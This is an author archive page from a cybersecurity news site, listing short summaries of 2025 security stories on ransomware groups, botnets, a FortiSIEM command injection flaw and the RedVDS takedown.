Author: Staff Writer

Avatar photo

John Marcelli is a staff writer for the CISO Brief, with a passion for exploring and writing about the ever-evolving world of technology. From emerging trends to in-depth reviews of the latest gadgets, John stays at the forefront of innovation, delivering engaging content that informs and inspires readers. When he's not writing, he enjoys experimenting with new tech tools and diving into the digital landscape.

Fast Facts In December 2025, the Sicarii ransomware operation emerged as a uniquely ideological group with Israeli/Jewish affiliations, openly displaying Hebrew language and symbols like Haganah. Unlike typical cybercriminal groups, Sicarii targets organizations in Arab and Muslim countries, employing geo-fencing to exclude Israeli systems and using sophisticated infrastructure for stealth and resilience. The malware performs network reconnaissance, exploits vulnerabilities like CVE-2025-64446 on Fortinet devices, and exfiltrates extensive data—including credentials and chat info—before encrypting files with AES-GCM and deploying destructive bootloader corruption. Organizations should focus on patching Fortinet devices, implementing network segmentation, and monitoring for zero-day exploits to defend against this…

Read More

Essential Insights In 2025, global ransomware attacks increased by 32%, totaling 7,419 incidents, with manufacturing being the most targeted sector and attack volumes rising significantly across various industries. Despite the rise in attacks, the average ransom demand decreased by 26% to $1.04 million, though manufacturing saw ransom demands more than double, reaching nearly $1.2 million. The United States experienced over 51% of attacks, with 3,810 incidents, and accounted for the highest number of affected records, including major breaches like Conduent and Episource, impacting millions. Qilin emerged as the most prolific ransomware group, responsible for 14% of attacks and claiming to…

Read More

Essential Insights A joint effort by Microsoft and global law enforcement dismantled the RedVDS-powered business email compromise (BEC) network, which operated as a low-cost cybercrime subscription platform providing virtual machines to threat actors. RedVDS enabled extensive phishing campaigns, fake portals, and payment diversion schemes targeting organizations in finance, real estate, healthcare, and manufacturing, compromising over 191,000 organizations worldwide. The attack chain involved renting RedVDS instances to send targeted phishing emails, harvesting credentials, monitoring email threads, and injecting fake replies to redirect large payments through fake bank details. The operation seized RedVDS domains, disrupted payment channels, and highlights the importance of…

Read More

Summary Points Eine internationale Operation hat den Cybercrime-Dienst RedVDS gemeinsam mit Microsoft und Behörden aus Deutschland, den USA und Großbritannien zerschlagen, inklusive Beschlagnahmung von Servern in Deutschland. RedVDS bot Cyberkriminellen eine Cloud-basierte Infrastruktur, um anonym massenhaft Phishing-Mails zu versenden und Schadsoftware zu betreiben, was Schäden in Milliardenhöhe verursachte. Die Schadenssumme wird auf mehrere hundert Millionen Euro geschätzt, mit mehreren einzelnen Opfern, darunter Unternehmen, Behörden und Privatpersonen weltweit. RedVDS nutzte ein Abonnementmodell, das für 24 Dollar monatlich virtuelle Server bereitstellte, um die Anonymität der Täter zu gewährleisten, was den Schutz vor Strafverfolgung erschwerte. What’s the Problem? In a highly coordinated effort,…

Read More

Top Highlights Threat actors linked to Chinese hosting infrastructure have established over 18,000 active command-and-control (C2) servers across 48 providers, with C2 activity accounting for roughly 84% of malicious activity in Chinese hosting environments. Major providers like China Unicom, Alibaba Cloud, and Tencent host the majority of these C2 servers, facilitating widespread malicious operations including botnets, cybercrime, and espionage. Malware families such as Mozi, ARL, Cobalt Strike, Vshell, and Mirai dominate the infrastructure, enabling attackers to operate across diverse campaigns while traditional detection methods struggle to track constantly evolving indicators. The extensive, shared infrastructure underscores the importance of holistic threat…

Read More

Essential Insights Ransomware groups are increasingly threatening victims with regulatory violations, especially targeting high-risk industries like healthcare, to coerce ransom payments. This form of “compliance extortion” forces companies to balance ransom costs against potentially crippling penalties and reputational damage. AI tools enable criminals to rapidly identify, craft, and threaten compliance violations, increasing the severity and speed of attacks amid stricter regulations like EU DORA and SEC rules. The ambiguity around compliance consequences amplifies fears, as either self-reporting or criminal threats to authorities carry significant, unpredictable risks for organizations. Key Challenge Recent reports reveal an alarming rise in ransomware attacks where…

Read More

Quick Takeaways Launch of Cloud Storage: March Networks has introduced a new Cloud Storage solution, collaborating with AWS, designed to help organizations securely retain video without high costs. Cost-Effective Model: The tiered cloud storage approach allows businesses to reduce long-term storage expenses by up to 80%, providing rapid access to recent footage while archiving older videos securely. Proven Savings: A customer with 580 cameras cut annual storage costs from $1.7 million to approximately $347,000, showcasing the financial benefits of March Networks’ cloud solution. Enhanced Software Capabilities: The update includes AI-driven features for faster searches and improved usability, along with new…

Read More

Essential Insights The Kimwolf botnet, emerging from the Aisuru DDoS botnet in August 2025, rapidly gained attention by temporarily dominating Cloudflare’s global domain rankings and infecting over 2 million Android TV devices through exploited residential proxy networks. Operators of Kimwolf, linked to previous cybercriminal groups, have shown they can quickly adapt tactics, such as shifting infrastructure and evading detection, with ongoing efforts to block command and control servers. The botnet primarily conducts brief but intense DDoS attacks, frequently targeting Minecraft servers, with some episodes lasting hours, and has so far avoided critical infrastructure but poses a potential for severe damage.…

Read More

Essential Insights In August 2025, Fortinet disclosed a severe OS command injection vulnerability (CVE-2025-25256) in FortiSIEM that allows unauthenticated remote code execution via crafted CLI requests, with exploits already active in the wild. The vulnerability involves an argument injection flaw leading to arbitrary file writes and privilege escalation to root, facilitated through the handling of user-controlled XML tags and the use of curl with the –next flag. Attackers can leverage this flaw to overwrite critical files like phLicenseTool with malicious scripts, gaining persistent admin and root access by exploiting cron jobs and writable files in the system. Fortinet recommends immediate…

Read More

Quick Takeaways Ransomware Surge: Ransomware attacks on telecommunications companies have surged nearly fourfold from 2022 to 2025, with incidents increasing from 24 to 90 as cybercriminals target critical infrastructure and sensitive subscriber data. Data Theft Incidents: A total of 444 incidents of data theft have been reported, including 133 instances of stolen databases potentially containing sensitive customer information. Geopolitical Motivations: Hackers are primarily motivated by the resale of customer data and strategic advantages in international conflicts, exacerbated by vulnerabilities in internet-facing infrastructure. Predominant Threat Actors: Major cybercrime gangs like Qilin, Akira, and Play led the ransomware attacks, targeting primarily companies…

Read More